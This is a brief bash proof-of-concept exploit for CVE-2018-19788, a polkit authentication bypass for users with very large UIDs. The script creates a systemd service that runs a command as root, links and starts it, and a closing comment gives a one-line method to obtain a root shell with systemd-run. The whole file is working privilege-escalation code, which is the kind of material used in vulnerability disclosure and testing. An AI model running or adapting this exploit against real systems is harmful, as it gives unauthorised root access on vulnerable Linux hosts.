#!/bin/bash
# PoC for CVE-2018-19788
# Rich Mirch
#
# Write-up: https://blog.mirch.io/2018/12/09/cve-2018-19788-poc-polkit-improper-handling-of-user-with-uid-int_max-leading-to-authentication-bypass/

cat >woot.service<<EOF
[Unit]
Description=Woot

[Service]
Type=notify
ExecStart=/bin/bash -c "echo woot \$(id)|wall"
KillMode=process
Restart=on-failure
RestartSec=42s

[Install]
WantedBy=multi-user.target
EOF

systemctl link $PWD/woot.service
systemctl start woot

# @paragonsec discovered a much cleaner method to get root. Use this instead
# https://twitter.com/paragonsec/status/1071152249529884674
# systemd-run -t /bin/bash